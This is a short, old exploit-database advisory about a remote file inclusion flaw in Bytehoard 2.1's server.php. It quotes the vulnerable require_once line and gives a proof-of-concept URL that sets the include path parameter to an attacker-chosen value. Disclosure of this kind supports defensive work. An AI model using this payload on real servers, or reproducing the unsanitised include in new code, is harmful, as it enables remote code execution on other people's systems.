Bytehoard 2.1 - 'server.php' Remote File Inclusion



EKU-ID: 9879 CVE: OSVDB-25948;CVE-2006-2849 OSVDB-ID:
Author: beford Published: 2006-06-01 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Script: Bytehoard 2.1 Epsilon/Delta  www.bytehoard.org
Discovered: beford <xbefordx gmail com>
File: ./bytehoard/includes/webdav/server.php
Vuln: Remote File Include

[code]
require_once $bhconfig['bhfilepath']."/includes/webdav/_parse_propfind.php";
[/code]


http://url.com/bytehoard/includes/webdav/server.php?bhconfig[bhfilepath]=attacker

# milw0rm.com [2006-06-01]